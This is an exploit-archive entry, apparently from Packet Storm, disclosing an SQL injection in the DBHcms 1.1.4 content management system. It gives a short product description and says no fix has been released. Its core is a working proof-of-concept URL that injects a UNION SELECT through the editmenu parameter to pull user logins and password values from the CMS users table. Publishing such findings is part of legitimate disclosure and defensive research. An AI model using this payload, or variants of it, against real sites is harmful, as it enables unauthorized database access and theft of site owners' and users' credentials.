DBHcms 1.1.4 SQL Injection

2010-10-24T00:00:00
ID PACKETSTORM:95148
Type packetstorm
Reporter ZonTa
Modified 2010-10-24T00:00:00

Description

                                        
                                            `DBHcms 1.1.4 SQL Injection Vulnerability  
  
# Exploit Title: DBHcms 1.1.4 SQL Injection Vulnerability  
# Date: 24-10-2010   
# Author: ZonTa  
# Mail: zontahackers[at]gmail[dot]com   
# IM : zontahackers[at]live[dot]com  
  
# Software Link: http://www.drbenhur.com/downloads-dbhcms-114-1-69-en.html  
# Version: 1.1.4  
# Tested on: Apache,PHP5  
  
  
ABOUT  
--------------  
  
The DBHcms is a Open Source content management system for personal  
and small business websites. It is search engine optimized, also  
for multiple languages simultaneously by allowing the search engine  
bot to index every single page.  
  
  
POC  
--------------  
  
http://192.168.1.100/DBHcms/index.php?dbhcms_pid=-81&editmenu=-2+union+select+1,2,3,4,5,6,group_concat(user_login,0x3a,user_passwd),8,9,10,11,12,13,14+from+dbhcms_cms_users--  
  
  
FIX  
--------------  
  
Not yet released.  
  
  
Greetz to Sri Lankanz ~  
`